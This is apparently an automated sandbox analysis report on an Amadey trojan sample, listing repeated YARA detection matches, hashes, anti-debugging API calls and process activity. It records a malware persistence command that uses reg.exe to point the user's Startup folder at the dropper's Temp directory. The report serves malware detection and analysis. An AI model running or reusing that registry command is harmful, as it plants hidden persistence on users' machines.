              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: S7AGd447vH.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: dllhost.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE42233 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,GetModuleHandleA,GetProcAddress,0_2_7FE42233
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE422AA NtQueryInformationProcess,0_2_7FE422AA
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE42233 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,GetModuleHandleA,GetProcAddress,7_2_7FE42233
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE422AA NtQueryInformationProcess,7_2_7FE422AA
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_3_005806650_3_00580665
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004200E80_2_004200E8
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004230A70_2_004230A7
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004242FD0_2_004242FD
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004252B00_2_004252B0
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004033600_2_00403360
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_0041FC500_2_0041FC50
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004145970_2_00414597
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00422F870_2_00422F87
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE4260F0_2_7FE4260F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 1_3_005F06651_3_005F0665
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_3_004E06657_3_004E0665
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE4260F7_2_7FE4260F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00406FE411_2_00406FE4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00405CE411_2_00405CE4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_004075E411_2_004075E4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_004056E411_2_004056E4
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: String function: 00411030 appears 39 times
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: String function: 0040FC60 appears 102 times
              Source: S7AGd447vH.exe, 00000000.00000002.1708672598.00000000005CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704342589.000000002293D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022B42000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000000.1663041864.0000000000464000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedllhost.exej% vs S7AGd447vH.exe
              Source: S7AGd447vH.exeBinary or memory string: OriginalFilenamedllhost.exej% vs S7AGd447vH.exe
              Source: S7AGd447vH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
